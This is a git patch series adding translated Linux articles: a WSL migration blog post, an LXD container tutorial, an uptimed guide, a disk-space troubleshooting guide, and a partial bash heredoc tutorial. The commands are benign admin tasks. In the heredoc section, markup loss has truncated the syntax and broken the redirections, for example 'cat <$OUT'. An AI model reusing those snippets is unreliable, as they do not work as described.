the inherent set backs from using Linux over Windows. Such as; + + * Most Propriatry Commerical Software is unavailable, E.G Maya, PhotoShop, Microsoft Office (In most cases the alternatives are not on par) + * Most Games are not ported to Linux, including games from major studios like EA, Rockstar Ect. + * Drivers for most hardware is a second thought for the manufacturers when it comes to linux. + + + +Before deciding upon windows I did look at other distributions and operatong systems. + +While doing so I looked more at the "Microsoft Loves Linux" compaign and came across WSL. Their new developer focused angle was interesting to me, so I gave it a try. + +### What I am Looking For in Windows + +I use computers mainly for programming, and I use virtual machines, git , ssh and rely heavily on bash for most of what I do. I also occasionally game, watch netflix and some light office work. + +In short I am looking to keep my current workflow in Ubuntu and transplant it onto Windows. I also want to take advantage of Windows strong points. + + * All PC Games Written For Windows + * Native Support for Most Programs + * Microsoft Office + + + +Now there are caveats with using windows, but I intend to maintain it correctly so I am not worried about the usual windows nasties such as viruses and malware. + +### Windows Subsystem For Linux (Bash on Ubuntu on Windows) + +Microsoft has worked closely with Canonical to bring Ubuntu to Windows. After quickly setting up and launching the program, you have a very familiar bash interface. + +Now I have been looking into the limitations of this, but the only real limitation I hit at the time of writing this article is that it is abstracted away from the hardware. For instance lsblk won't show what partitions you have, because Ubuntu is not being given that information. + +But besides accessing low level tools, I found the experience to be quite familiar and nice. + +I utilised this within my workflow for the following. + + * Generating SSH Keypair + * Using Git with Github to manage my repositories + * SSH into several servers, including passwordless + * Running MySQL for Local Databases + * Monitoring System Resources + * Using VIM for Config Files + * Running Bash Scripts + * Running Local Web Server + * Running PHP, NodeJS + + + +It has proven so far to be quite the formidable tool, and besides being in the Window 10 UI, my workflow feels almost identical to when I was on Ubuntu itself. Although most of my workload can be handled in WSL, i still intend on having virtual machines on had for mote indepth work which may be beyond the scope of wsl. + +### No WINE for me + +Another major upside I am experiencing is compatibility.Now I rarely used WINE to enable me to use windows software. But on occasion it was needed, and usually was not very good. + +#### HeidiSQL + +One of the first Programs I installed was HeidiSQL, one of my favourite DB Clients. It does work under wine, but it felt horrid so I ditched it for MySQL Workbench. Having it back in pride of place in windows is like having a trusty old friend back. + +#### Gaming / Steam + +What is a Windows PC without a little gaming. I installed steam from its website and was greated with all my linux catalogue, plus my windows catalogue which was 5 times bigger and including AAA titles like GTA V. Something I could only dream about in Ubuntu. + +Now I had so much hope for SteamOS and still do, but I don't think it will ever make a dent in the gaming market anywhere in the near future. So if you want to game on a pc, you really do need windows. + +Something else noted, the driver support was better for ny nvidia graphics card which made some linux native games like TF2 run slightly better. + +**Windows will always be superior in gaming, so this was not much of a surprise** + +### Running From a USB HDD and WHY + +I run linux on my main sss drives, but have in the past run from usb keys and usb hard drives. I got used to this durability of linux which allowed me to try out multiple versiobs long term without loosing my main os. Now the last time i tried installing windows to a usb connected hdd it just did not work and was impossoble, so when I did a clone of my Windows HDD as a backup, I was surprised when I could boot from it over USB. + +This has become a handy option for me as I plan to migrate my work laptop back to windows, but did not want to be risky and just throw it on there. + +So for the past few days I have ran it from the USB, and apart from a few buggy messages, I have had no real downside from running it over USB. + +The notable issues doing this is: + + * Slower Boot Speed + * Annoying Don't Unplug Your USB message + * Not been able to get it to Activate + + + +**I might do an article just on Windows on a USB Drive so we can go into more detail.** + +### So what is the verdict? + +I have been using windows 10 for about two weeks now, and have not noticed any negative effect to my work flow. All the tools I need are on hand and the OS is generally behaving, although there have been some minor hiccups along the way. + +## Will I stay with windows + +Although it's early days, I think I will be sticking with windows the the forseable future. + +-------------------------------------------------------------------------------- + +via: https://www.chris-shaw.com/blog/my-adventure-migrating-back-to-windows + +作者:[Christopher Shaw][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.chris-shaw.com +[1]:https://winaero.com/blog/wp-content/uploads/2016/07/Ubutntu-on-Windows-10-logo-banner.jpg From 7ce90f1e334c5c6a2ed30e0190d78d57866d63b2 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:53:27 +0800 Subject: [PATCH 0900/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Trying=20out=20?= =?UTF-8?q?LXD=20containers=20on=20our=20Ubuntu?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Trying out LXD containers on our Ubuntu.md | 227 ++++++++++++++++++ 1 file changed, 227 insertions(+) create mode 100644 sources/tech/20160625 Trying out LXD containers on our Ubuntu.md diff --git a/sources/tech/20160625 Trying out LXD containers on our Ubuntu.md b/sources/tech/20160625 Trying out LXD containers on our Ubuntu.md new file mode 100644 index 0000000000..85dad4206d --- /dev/null +++ b/sources/tech/20160625 Trying out LXD containers on our Ubuntu.md @@ -0,0 +1,227 @@ +translating by lujun9972 +Trying out LXD containers on our Ubuntu +====== +This post is about containers, a construct similar to virtual machines (VM) but so much lightweight that you can easily create a dozen on your desktop Ubuntu! + +A VM virtualizes a whole computer and then you install in there the guest operating system. **In contrast** , a container **reuses** the host Linux kernel and simply **contains** just the root filesystem (aka runtimes) of our choice. The Linux kernel has several features that rigidly separate the running Linux container from our host computer (i.e. our desktop Ubuntu). + +By themselves, Linux containers would need some manual work to manage them directly. Fortunately, there is LXD (pronounced Lex-deeh), a service that manages Linux containers for us. + +We will see how to + + 1. setup our Ubuntu desktop for containers, + 2. create a container, + 3. install a Web server, + 4. test it a bit, and + 5. clear everything up. + + + +### Set up your Ubuntu for containers + +If you have Ubuntu 16.04, then you are ready to go. Just install a couple of extra packages that we see below. If you have Ubuntu 14.04.x or Ubuntu 15.10, see [LXD 2.0: Installing and configuring LXD [2/12]][1] for some extra steps, then come back. + +Make sure the package list is up-to-date: +``` +sudo apt update +sudo apt upgrade +``` + +Install the **lxd** package: +``` +sudo apt install lxd +``` + +If you have Ubuntu 16.04, you can enable the feature to store your container files in a ZFS filesystem. The Linux kernel in Ubuntu 16.04 includes the necessary kernel modules for ZFS. For LXD to use ZFS for storage, we just need to install a package with ZFS utilities. Without ZFS, the containers would be stored as separate files on the host filesystem. With ZFS, we have features like copy-on-write which makes the tasks much faster. + +Install the **zfsutils-linux** package (if you have Ubuntu 16.04.x): +``` +sudo apt install zfsutils-linux +``` + +Once you installed the LXD package on the desktop Ubuntu, the package installation scripts should have added you to the **lxd** group. If your desktop account is a member of that group, then your account can manage containers with LXD and can avoid adding sudo in front of all commands. The way Linux works, **you would need to log out from the desktop session and then log in again** to activate the **lxd** group membership. (If you are an advanced user, you can avoid the re-login by newgrp lxd in your current shell). + +Before use, LXD should be initialized with our storage choice and networking choice. + +Initialize **lxd** for storage and networking by running the following command: +``` +$ **sudo  lxd init** +Name of the storage backend to use (dir or zfs): **zfs** +Create a new ZFS pool (yes/no)? **yes** +Name of the new ZFS pool: **lxd-pool** +Would you like to use an existing block device (yes/no)? **no** +Size in GB of the new loop device (1GB minimum): **30** +Would you like LXD to be available over the network (yes/no)? **no** +Do you want to configure the LXD bridge (yes/no)? **yes** +**> You will be asked about the network bridge configuration. Accept all defaults and continue.** +Warning: Stopping lxd.service, but it can still be activated by: + lxd.socket + LXD has been successfully configured. +$ _ +``` + +We created the ZFS pool as a filesystem inside a (single) file, not a block device (i.e. in a partition), thus no need for extra partitioning. In the example I specified 30GB, and this space will come from the root (/) filesystem. If you want to look at this file, it is at /var/lib/lxd/zfs.img. + +That's it! The initial configuration has been completed. For troubleshooting or background information, see https://www.stgraber.org/2016/03/15/lxd-2-0-installing-and-configuring-lxd-212/ + +### Create your first container + +All management commands with LXD are available through the **lxc** command. We run **lxc** with some parameters and that 's how we manage containers. +``` +lxc list +``` + +to get a list of installed containers. Obviously, the list will be empty but it verifies that all are fine. +``` +lxc image list +``` + +shows the list of (cached) images that we can use to launch a container. Obviously, the list will be empty but it verifies that all are fine. +``` +lxc image list ubuntu: +``` + +shows the list of available remote images that we can use to download and launch as containers. This specific list shows Ubuntu images. +``` +lxc image list images: +``` + +shows the list of available remote images for various distributions that we can use to download and launch as containers. This specific list shows all sort of distributions like Alpine, Debian, Gentoo, Opensuse and Fedora. + +Let's launch a container with Ubuntu 16.04 and call it c1: +``` +$ lxc launch ubuntu:x c1 +Creating c1 +Starting c1 +$ _ +``` + +We used the launch action, then selected the image **ubuntu:x** (x is an alias for the Xenial/16.04 image) and lastly we use the name c1 for our container. + +Let's view our first installed container, +``` +$ lxc list + ++---------|---------|----------------------|------|------------|-----------+ +| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | ++---------|---------|----------------------|------|------------|-----------+ +| c1 | RUNNING | 10.173.82.158 (eth0) | | PERSISTENT | 0 | ++---------|---------|----------------------|------|------------|-----------+ +``` + +Our first container c1 is running and it has an IP address (accessible locally). It is ready to be used! + +### Install a Web server + +We can run commands in our container. The action for running commands, is **exec**. +``` +$ lxc exec c1 -- uptime + 11:47:25 up 2 min, 0 users, load average: 0.07, 0.05, 0.04 +$ _ +``` + +After the action exec, we specify the container and finally we type command to run inside the container. The uptime is just 2 minutes, it's a fresh container :-). + +The -- thing on the command line has to do with parameter processing of our shell. If our command does not have any parameters, we can safely omit the -. +``` +$ lxc exec c1 -- df -h +``` + +This is an example that requires the -, because for our command we use the parameter -h. If you omit the -, you get an error. + +Let's get a shell in the container, and update the package list already. +``` +$ lxc exec c1 bash +root@c1:~# **apt update** +Ign http://archive.ubuntu.com trusty InRelease +Get:1 http://archive.ubuntu.com trusty-updates InRelease [65.9 kB] +Get:2 http://security.ubuntu.com trusty-security InRelease [65.9 kB] +... +Hit http://archive.ubuntu.com trusty/universe Translation-en +Fetched 11.2 MB in 9s (1228 kB/s) +Reading package lists... Done +root@c1:~# **apt upgrade** +Reading package lists... Done +Building dependency tree +... +Processing triggers for man-db (2.6.7.1-1ubuntu1) ... +Setting up dpkg (1.17.5ubuntu5.7) ... +root@c1:~# _ +``` + +We are going to install **nginx** as our Web server. nginx is somewhat cooler than Apache Web server. +``` +root@c1:~# apt install nginx +Reading package lists... Done +Building dependency tree +... +Setting up nginx-core (1.4.6-1ubuntu3.5) ... +Setting up nginx (1.4.6-1ubuntu3.5) ... +Processing triggers for libc-bin (2.19-0ubuntu6.9) ... +root@c1:~# _ +``` + +Let's view our Web server with our browser. Remeber the IP address you got 10.173.82.158, so I enter it into my browser. + +[![lxd-nginx][2]][3] + +Let's make a small change in the text of that page. Back inside our container, we enter the directory with the default HTML page. +``` +root@c1:~# **cd /var/www/html/** +root@c1:/var/www/html# **ls -l** +total 2 +-rw-r--r-- 1 root root 612 Jun 25 12:15 index.nginx-debian.html +root@c1:/var/www/html# +``` + +We can edit the file with nano, then save + +[![lxd-nginx-nano][4]][5] + +Finally, let's check the page again, + +[![lxd-nginx-modified][6]][7] + +### Clearing up + +Let's clear up the container by deleting it. We can easily create new ones when we need them. +``` +$ **lxc list** ++---------|---------|----------------------|------|------------|-----------+ +| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | ++---------|---------|----------------------|------|------------|-----------+ +| c1 | RUNNING | 10.173.82.169 (eth0) | | PERSISTENT | 0 | ++---------|---------|----------------------|------|------------|-----------+ +$ **lxc stop c1** +$ **lxc delete c1** +$ **lxc list** ++---------|---------|----------------------|------|------------|-----------+ +| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | ++---------|---------|----------------------|------|------------|-----------+ ++---------|---------|----------------------|------|------------|-----------+ + +``` + +We stopped (shutdown) the container, then we deleted it. + +That's all. There are many more ideas on what do with containers. Here are the first steps on setting up our Ubuntu desktop and trying out one such container. + + +-------------------------------------------------------------------------------- + +via: https://blog.simos.info/trying-out-lxd-containers-on-our-ubuntu/ + +作者:[Simos Xenitellis][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.simos.info/author/simos/ +[1]:https://www.stgraber.org/2016/03/15/lxd-2-0-installing-and-configuring-lxd-212/ +[2]:https://i2.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx.png?resize=564%2C269&ssl=1 +[3]:https://i2.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx.png?ssl=1 +[4]:https://i2.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx-nano.png?resize=750%2C424&ssl=1 +[5]:https://i2.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx-nano.png?ssl=1 +[6]:https://i1.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx-modified.png?resize=595%2C317&ssl=1 +[7]:https://i1.wp.com/blog.simos.info/wp-content/uploads/2016/06/lxd-nginx-modified.png?ssl=1 From d70504eba426a8a753a222d49324d3b52060ee70 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 22:01:19 +0800 Subject: [PATCH 0901/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20reco?= =?UTF-8?q?rd=20statistics=20about=20a=20Linux=20machine=E2=80=99s=20uptim?= =?UTF-8?q?e?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...atistics about a Linux machine-s uptime.md | 215 ++++++++++++++++++ 1 file changed, 215 insertions(+) create mode 100644 sources/tech/20171109 How to record statistics about a Linux machine-s uptime.md diff --git a/sources/tech/20171109 How to record statistics about a Linux machine-s uptime.md b/sources/tech/20171109 How to record statistics about a Linux machine-s uptime.md new file mode 100644 index 0000000000..1a5be11efa --- /dev/null +++ b/sources/tech/20171109 How to record statistics about a Linux machine-s uptime.md @@ -0,0 +1,215 @@ +How to record statistics about a Linux machine’s uptime +====== +Linux/Unix sysadmins have a weird obsession with server uptime. There is a xkcd comic devoted to this subject where a good sysadmin is an unstoppable force that it stands between the forces of darkness and your cat blog's servers. +[![Fig.01: Devotion to Duty https://xkcd.com/705/][1]][1] +One can tell how long the Linux system has been running using the uptime command or [w command][2] or top command. I can get [a report of the historical and statistical running time of the system][3], keeping it between restarts using tuptime tool. + +Like uptime command but with the more impressive output. Recently I discovered another tool called uptimed that records statistics about a machine's uptime. Let us see how to get uptime record statistics using uptimed and uprecords on Linux operating system. + +Finding uptime is pretty easy, just type the following on your Linux based system: +``` +$ **uptime -p** +up 2 weeks, 4 days, 7 hours, 28 minutes +``` +To keep historical stats about uptime use either [tuptime][3] or uptimed tool. + +## uptimed installation + +The simplest way to install uptimed locally is through your package managers such as apt/apt-get/yum and friends as per your Linux distro. + +### Install uptimed on a Debian/Ubuntu Linux + +Type the following [apt command][4]/[apt-get command][5]: +`$ sudo apt-get install uptimed` +Sample outputs: +``` +Reading package lists... Done +Building dependency tree +Reading state information... Done +The following additional packages will be installed: + libuptimed0 +The following NEW packages will be installed: + libuptimed0 uptimed +0 upgraded, 2 newly installed, 0 to remove and 3 not upgraded. +Need to get 40.7 kB of archives. +After this operation, 228 kB of additional disk space will be used. +Do you want to continue? [Y/n] y +Get:1 http://mirrors.linode.com/ubuntu xenial/universe amd64 libuptimed0 amd64 1:0.3.17-4 [9,050 B] +Get:2 http://mirrors.linode.com/ubuntu xenial/universe amd64 uptimed amd64 1:0.3.17-4 [31.6 kB] +Fetched 40.7 kB in 0s (2,738 kB/s) +Preconfiguring packages ... +Selecting previously unselected package libuptimed0. +(Reading database ... 39163 files and directories currently installed.) +Preparing to unpack .../libuptimed0_1%3a0.3.17-4_amd64.deb ... +Unpacking libuptimed0 (1:0.3.17-4) ... +Selecting previously unselected package uptimed. +Preparing to unpack .../uptimed_1%3a0.3.17-4_amd64.deb ... +Unpacking uptimed (1:0.3.17-4) ... +Processing triggers for systemd (229-4ubuntu21) ... +Processing triggers for ureadahead (0.100.0-19) ... +Processing triggers for man-db (2.7.5-1) ... +Setting up libuptimed0 (1:0.3.17-4) ... +Setting up uptimed (1:0.3.17-4) ... +Processing triggers for libc-bin (2.23-0ubuntu9) ... +Processing triggers for systemd (229-4ubuntu21) ... +Processing triggers for ureadahead (0.100.0-19) ... +``` + +### Install uptimed on a CentOS/RHEL/Fedora/Oracle/Scientific Linux + +First [enable EPEL repo on a CentOS/RHEL][6]: +`$ sudo yum -y install epel-release` +Next, type the following [yum command][7]: +`$ sudo yum install uptimed` +Sample outputs: +``` +Loaded plugins: fastestmirror +Loading mirror speeds from cached hostfile + * base: centos.excellmedia.net + * epel: ftp.cuhk.edu.hk + * extras: centos.excellmedia.net + * updates: centos.excellmedia.net +Resolving Dependencies +--> Running transaction check +---> Package uptimed.x86_64 0:0.4.0-6.el7 will be installed +--> Finished Dependency Resolution + +Dependencies Resolved + +=============================================================================== + Package Arch Version Repository Size +=============================================================================== +Installing: + uptimed x86_64 0.4.0-6.el7 epel 47 k + +Transaction Summary +=============================================================================== +Install 1 Package + +Total download size: 47 k +Installed size: 98 k +Is this ok [y/d/N]: y +Downloading packages: +uptimed-0.4.0-6.el7.x86_64.rpm | 47 kB 00:01 +Running transaction check +Running transaction test +Transaction test succeeded +Running transaction + Installing : uptimed-0.4.0-6.el7.x86_64 1/1 + Verifying : uptimed-0.4.0-6.el7.x86_64 1/1 + +Installed: + uptimed.x86_64 0:0.4.0-6.el7 + +Complete! +``` + +If you are using **a Fedora Linux** , run the following dnf command: +`$ sudo dnf install uptimed` + +### Install uptimed on an Arch Linux + +Type the following pacman command: +`$ sudo pacman -S uptimed` + +### Install uptimed on a Gentoo Linux + +Type the following emerge command: +`$ sudo emerge --ask uptimed` + +## How to configure uptimed + +Edit the file /etc/uptimed.conf using a text editor such as vim command: +`$ sudo vim /etc/uptimed.conf` +At least set an email address to mail milestones/records to. Assumes sendmail compatible MTA installed as /usr/lib/sendmail. +``` +EMAIL=vivek@server1.cyberciti.biz +``` +Save and close the file. + +### How do I enable uptimed service at boot time? + +Enable uptimed service using the systemctl command: +`$ sudo systemctl enable uptimed` + +### How do I start/stop/restart or view status of uptimed service? + +``` +$ sudo systemctl start uptimed ## start it ## +$ sudo systemctl stop uptimed ## stop it ## +$ sudo systemctl restart uptimed ## restart it ## +$ sudo systemctl status uptimed ## view status ## +``` +Sample outputs: +``` +● uptimed.service - uptime record daemon + Loaded: loaded (/lib/systemd/system/uptimed.service; enabled; vendor preset: enabled) + Active: active (running) since Thu 2017-11-09 17:49:14 UTC; 18min ago + Main PID: 11137 (uptimed) + CGroup: /system.slice/uptimed.service + └─11137 /usr/sbin/uptimed -f + +Nov 09 17:49:14 gfs04 systemd[1]: Started uptime record daemon. +``` + +## How to see uptime record + +Simply type the following command to see statistics from the uptimed(8) program: +``` +$ uprecords +``` +Sample outputs: +[![Fig.02: uprecords in action][9]][9] +uprecords has a few more option: +``` +$ uprecords -? +``` +Sample outputs: +``` +usage: uprecords [OPTION]... + + -? this help + -a do not print ansi codes + -b sort by boottime + -B reverse sort by boottime + -k sort by sysinfo + -K reverse sort by sysinfo + -d print downtime seen before every uptimes instead of system + -c do not show current entry if not in top entries + -f run continously in a loop + -s do not print extra statistics + -w wide output (more than 80 cols per line) + -i INTERVAL use INTERVAL seconds for loop instead of 5, implies -f + -m COUNT show a maximum of top COUNT entries instead of 10 + -M show next milestone + -v version information +``` + +## Conclusion + +This is an excellent little tool to show your server uptime records to prove your uptime and business continuity. On a related note, you should get the official [XKCD sysadmin t-shirt][10] as comic was made into a shirt, which includes a new illustration on the back. +[![Fig.03: Sysadmin XKCD shirt features the original comic on the front and a new illustration on the back.][11]][11] + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/hardware/see-records-statistics-about-a-linux-servers-uptime/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/cms/2017/11/devotion_to_duty.png +[2]:https://www.cyberciti.biz//www.cyberciti.biz/faq/unix-linux-w-command-examples-syntax-usage-2/ (See Linux/Unix w command examples for more info) +[3]:https://www.cyberciti.biz/hardware/howto-see-historical-statistical-uptime-on-linux-server/ +[4]:https://www.cyberciti.biz//www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info) +[5]:https://www.cyberciti.biz//www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info) +[6]:https://www.cyberciti.biz/faq/installing-rhel-epel-repo-on-centos-redhat-7-x/ +[7]:https://www.cyberciti.biz//www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info) +[8]:https://www.cyberciti.biz/cdn-cgi/l/email-protection +[9]:https://www.cyberciti.biz/media/new/cms/2017/11/uprecord-screenshot.jpg +[10]:https://store.xkcd.com/collections/apparel/products/sysadmin +[11]:https://www.cyberciti.biz/media/new/cms/2017/11/sysadmin_shirt_5_1024x1024.jpg From b06171772b55cef6da549bedff164d65bb7ee9f0 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 22:14:35 +0800 Subject: [PATCH 0902/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Fix?= =?UTF-8?q?=20the=20=E2=80=98No=20Space=20Left=20on=20Device=E2=80=99=20Er?= =?UTF-8?q?ror=20on=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...No Space Left on Device- Error on Linux.md | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 sources/tech/20171115 How to Fix the ‘No Space Left on Device- Error on Linux.md diff --git a/sources/tech/20171115 How to Fix the ‘No Space Left on Device- Error on Linux.md b/sources/tech/20171115 How to Fix the ‘No Space Left on Device- Error on Linux.md new file mode 100644 index 0000000000..0ab151e9d5 --- /dev/null +++ b/sources/tech/20171115 How to Fix the ‘No Space Left on Device- Error on Linux.md @@ -0,0 +1,93 @@ +translating by lujun9972 +How to Fix the ‘No Space Left on Device’ Error on Linux +====== + +![](https://www.maketecheasier.com/assets/uploads/2017/10/no-space-feat.jpg) + +So your Linux system is telling you that you have no space left on your hard drive, but you know there is actually a lot of free space left. Why? This is one of those few frustratingly vague errors on Linux systems, but there are a few usual culprits. + +## Check du and df + +Before you go any further, it's a good idea to check that there really _is_ space left on the disk. While the tools in your desktop environment are good, it 's much better to use the direct ones from the command line. + +![Linux Filesystem du][1] + +Begin with `du`. Point it to the base directory on the drive that's having the problem. This guide is assuming it's the partition with root. +``` +sudo du -sh / +``` + +![Linux Filesystem df][2] + +It'll take some time to go through everything. Now, try with `df`. +``` +sudo df -h +``` + +Add root and the filesystems mounted under it. For example, if you have "/home" on a separate drive, add that in with the reading for root. The total should come out close to what you had with `du`. If not, that might point toward a deleted file being used by a process. + +Of course, the main concern here is whether or not the results of these commands come in under the size of the drive. If it did, there's obviously something wrong. + + **Related** : [Use Agedu to Analyze Hard Disk Space Usage in Linux][3] + +## Possible Causes + +There are a couple of main causes here. If you saw a discrepancy between `du` and `df` you can jump down to the first option here. Otherwise, start at the second one. + +### Deleted File Reserved by Process + +Occasionally, a file will be deleted, but a process is still using it. Linux won't release the storage associated with the file while the process is still running. You just need to find the process and restart it. + +![Check processes for deleted files][4] + +Try to locate the process. +``` +sudo lsof / | grep deleted +``` + +The problematic process should be listed, then just restart it. +``` +sudo systemctl restart service_name +``` + +### Not Enough Inodes + +![Linux check filesystem inodes][5] + +There is a set of metadata on filesystems called "inodes." Inodes track information about files. A lot of filesystems have a fixed amount of inodes, so it's very possible to fill the max allocation of inodes without filling the filesystem itself. You can use `df` to check. +``` +sudo df -i / +``` + +Compare the inodes used with the total inodes. If there's no more available, unfortunately, you can't get more. Delete some useless or out-of-date files to clear up inodes. + +### Bad Blocks + +The last common problem is bad filesystem blocks. Filesystems get corrupt and hard drives die. Your operating system will most likely see those blocks as usable unless they're otherwise marked. The best way to find and mark those blocks is by using `fsck` with the `-cc` flag. Remember that you can't use `fsck` from the same filesystem that you're testing. You'll probably need to use a live CD. +``` +sudo fsck -vcck /dev/sda2 +``` + +Obviously, replace the drive location with the drive that you want to check. Also, keep in mind that this will probably take a long time. + + **Related** : [Check and Repair Your Filesystem With fsck [Linux]][6] + +Hopefully, one of these solutions solved your problem. This issue isn't exactly easy to diagnose in every instance. With any luck, though, you can get it cleared up and have your hard drive working again as normal. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/fix-linux-no-space-left-on-device-error/ + +作者:[Nick Congleton][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/nickcongleton/ +[1]:https://www.maketecheasier.com/assets/uploads/2017/10/no-space-du.jpg (Linux Filesystem du) +[2]:https://www.maketecheasier.com/assets/uploads/2017/10/no-space-df.jpg (Linux Filesystem df) +[3]:https://www.maketecheasier.com/agedu-analyze-hard-disk-space-usage-in-linux/ (Use Agedu to Analyze Hard Disk Space Usage in Linux) +[4]:https://www.maketecheasier.com/assets/uploads/2017/10/no-space-process.jpg (Check processes for deleted files) +[5]:https://www.maketecheasier.com/assets/uploads/2017/10/no-space-inode.jpg (Linux check filesystem inodes) +[6]:https://www.maketecheasier.com/check-repair-filesystem-fsck-linux/ (Check and Repair Your Filesystem With fsck [Linux]) From bc01aab5f3a4b38347e3e6361c845730c6643062 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 22:24:32 +0800 Subject: [PATCH 0903/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use?= =?UTF-8?q?=20a=20here=20documents=20to=20write=20data=20to=20a=20file=20i?= =?UTF-8?q?n=20bash=20script?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to write data to a file in bash script.md | 203 ++++++++++++++++++ 1 file changed, 203 insertions(+) create mode 100644 sources/tech/20171116 How to use a here documents to write data to a file in bash script.md diff --git a/sources/tech/20171116 How to use a here documents to write data to a file in bash script.md b/sources/tech/20171116 How to use a here documents to write data to a file in bash script.md new file mode 100644 index 0000000000..12d15af78f --- /dev/null +++ b/sources/tech/20171116 How to use a here documents to write data to a file in bash script.md @@ -0,0 +1,203 @@ +How to use a here documents to write data to a file in bash script +====== + +A here document is nothing but I/O redirection that tells the bash shell to read input from the current source until a line containing only delimiter is seen. +[![redirect output of here document to a text file][1]][1] +This is useful for providing commands to ftp, cat, echo, ssh and many other useful Linux/Unix commands. This feature should work with bash or Bourne/Korn/POSIX shell too. + +## heredoc syntax + +How do I use a heredoc redirection feature (here documents) to write data to a file in my bash shell scripts? [A here document][2] is nothing but I/O redirection that tells the bash shell to read input from the current source until a line containing only delimiter is seen.This is useful for providing commands to ftp, cat, echo, ssh and many other useful Linux/Unix commands. This feature should work with bash or Bourne/Korn/POSIX shell too. + +The syntax is: +``` +command < my_output_file.txt + mesg1 + msg2 + msg3 + $var on $foo +EOF +``` + +OR **redirect and append it** to a file named my_output_file.txt: +``` +command << EOF >> my_output_file.txt + mesg1 + msg2 + msg3 + $var on $foo +EOF +``` + +## Examples + +The following script will write the needed contents to a file named /tmp/output.txt: +``` +#!/bin/bash +OUT=/tmp/output.txt + +echo "Starting my script..." +echo "Doing something..." + +cat <$OUT + Status of backup as on $(date) + Backing up files $HOME and /etc/ +EOF + +echo "Starting backup using rsync..." +``` + + +You can view /tmp/output.txt with the [cat command][3]: +`$ cat /tmp/output.txt` +Sample outputs: +``` + Status of backup as on Thu Nov 16 17:00:21 IST 2017 + Backing up files /home/vivek and /etc/ + +``` + +### Disabling pathname/parameter/variable expansion, command substitution, arithmetic expansion + +Variable such as $HOME and command such as $(date) were interpreted substitution in script. To disable it use single quotes with 'EOF' as follows: +``` +#!/bin/bash +OUT=/tmp/output.txt + +echo "Starting my script..." +echo "Doing something..." +# No parameter and variable expansion, command substitution, arithmetic expansion, or pathname expansion is performed on word. +# If any part of word is quoted, the delimiter is the result of quote removal on word, and the lines in the here-document +# are not expanded. So EOF is quoted as follows +cat <<'EOF' >$OUT + Status of backup as on $(date) + Backing up files $HOME and /etc/ +EOF + +echo "Starting backup using rsync..." +``` + +#!/bin/bash OUT=/tmp/output.txtecho "Starting my script..." echo "Doing something..." # No parameter and variable expansion, command substitution, arithmetic expansion, or pathname expansion is performed on word. # If any part of word is quoted, the delimiter is the result of quote removal on word, and the lines in the here-document # are not expanded. So EOF is quoted as follows cat <<'EOF' >$OUT Status of backup as on $(date) Backing up files $HOME and /etc/ EOFecho "Starting backup using rsync..." + +You can view /tmp/output.txt with the [cat command][3]: +`$ cat /tmp/output.txt` +Sample outputs: +``` + Status of backup as on $(date) + Backing up files $HOME and /etc/ + +``` + +## A note about using tee command + +The syntax is: +``` +tee /tmp/filename </dev/null +line 1 +line 2 +line 3 +$(cmd) +$var on $foo +EOF +``` + +tee /tmp/filename </dev/null line 1 line 2 line 3 $(cmd) $var on $foo EOF + +Or disable variable substitution/command substitution by quoting EOF in a single quote: +``` +tee /tmp/filename <<'EOF' >/dev/null +line 1 +line 2 +line 3 +$(cmd) +$var on $foo +EOF +``` + +tee /tmp/filename <<'EOF' >/dev/null line 1 line 2 line 3 $(cmd) $var on $foo EOF + +Here is my updated script: +``` +#!/bin/bash +OUT=/tmp/output.txt + +echo "Starting my script..." +echo "Doing something..." + +tee $OUT </dev/null + Status of backup as on $(date) + Backing up files $HOME and /etc/ +EOF + +echo "Starting backup using rsync..." +``` + +#!/bin/bash 